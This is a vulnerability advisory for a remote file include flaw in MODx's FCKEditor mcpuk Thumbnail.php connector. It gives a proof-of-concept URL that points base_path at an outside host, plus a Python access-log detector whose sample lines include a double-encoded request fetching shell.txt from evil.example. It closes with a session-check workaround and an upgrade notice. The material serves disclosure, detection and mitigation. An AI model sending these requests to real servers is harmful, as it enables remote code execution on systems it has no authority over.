The FCKEditor "mcpuk" file-browser connector shipped with MODx CMS contains a remote file include (RFI) vulnerability in its Thumbnail.php command script: the base_path parameter is taken from the request and used to build the path of a file that the script includes, so a URL pointing at an attacker-controlled host is fetched and executed as PHP on the server. Exploitation depends on the PHP configuration allowing remote includes (allow_url_fopen, and allow_url_include on PHP 5.2 and later).
An attacker can exploit this issue via any web client; no manager login is required.
The following proof of concept is available (replace [path] with the directory of the MODx installation):
http://www.example.com/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.example2.com/
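To hunt for this request pattern in web-server access logs, the following is an added Python example (not part of the original advisory and not MODx code): it parses Apache combined-format lines, matches requests to Thumbnail.php whose base_path value is a URL or a PHP stream wrapper, and decodes one extra level of percent-encoding so double-encoded payloads are not missed. The log lines, hosts and IP addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache "combined" access-log lines for this example; none are
# real traffic. Lines 1 and 2 mirror the proof-of-concept request above,
# line 2 with a double-encoded base_path; lines 3 and 4 are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2006:13:55:36 +0000] "GET /modx/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.example2.com/ HTTP/1.1" 200 512 "-" "curl/7.15.0"
198.51.100.4 - - [10/Oct/2006:13:56:01 +0000] "GET /modx/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=%2568ttps%253a%252f%252fevil.example%252fshell.txt%253f HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2006:13:57:12 +0000] "GET /modx/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?FileName=a.jpg HTTP/1.1" 200 2048 "http://www.example.com/manager/" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2006:13:58:00 +0000] "GET /modx/index.php?id=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# URL schemes and PHP stream wrappers that make include() pull in content
# that is not a local file path.
REMOTE_RE = re.compile(r'^(?:https?|ftps?|php|data)://|^data:', re.IGNORECASE)


def is_remote_include(value):
    """True if a parameter value would make a PHP include() fetch remote or
    wrapper-backed content. One extra unquote() pass catches values that were
    percent-encoded twice (parse_qs already removed one level)."""
    return bool(REMOTE_RE.match(unquote(value).strip()))


def find_rfi_attempts(log_text, script="Thumbnail.php", param="base_path"):
    """Return one dict per request to `script` whose `param` is a remote include.
    The target script and parameter name default to the ones in the advisory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/" + script):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get(param, []):
            if is_remote_include(value):
                hits.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": int(m.group("status")),
                    "base_path": unquote(value),
                })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print("{ip} {ts} status={status} base_path={base_path}".format(**hit))
```

Two things worth noting when reading the output: the trailing "?" in the second hit is a common RFI trick, since whatever filename the script appends after base_path then becomes a query string for the attacker's server instead of changing the fetched path; and a 500 status does not mean the attempt failed, because the remote PHP may have executed before the script errored out.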
Workaround: add the check below at the top of /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php, before any include that uses base_path. It refuses the request unless the session flag that MODx sets on a successful manager login is present, which blocks the unauthenticated direct request shown above. $_SESSION is only populated once a session has been started; if the guard runs without one, isset() is false and the request is refused, which is the safe outcome.
Code:
<?php
// Reject direct, unauthenticated access to the command script:
// mgrValidated is set in the session only after a MODx manager login.
if(!isset($_SESSION['mgrValidated'])) {
die("<b>INCLUDE_ORDERING_ERROR</b><br /><br />Please use the MODx Content Manager instead of accessing this file directly.");
}
The check only gates access; it does not change how base_path is used, so a logged-in manager user could still reach the vulnerable include. For a proper fix, update your site to MODx 0.9.2.2:
http://modxcms.com/downloads.html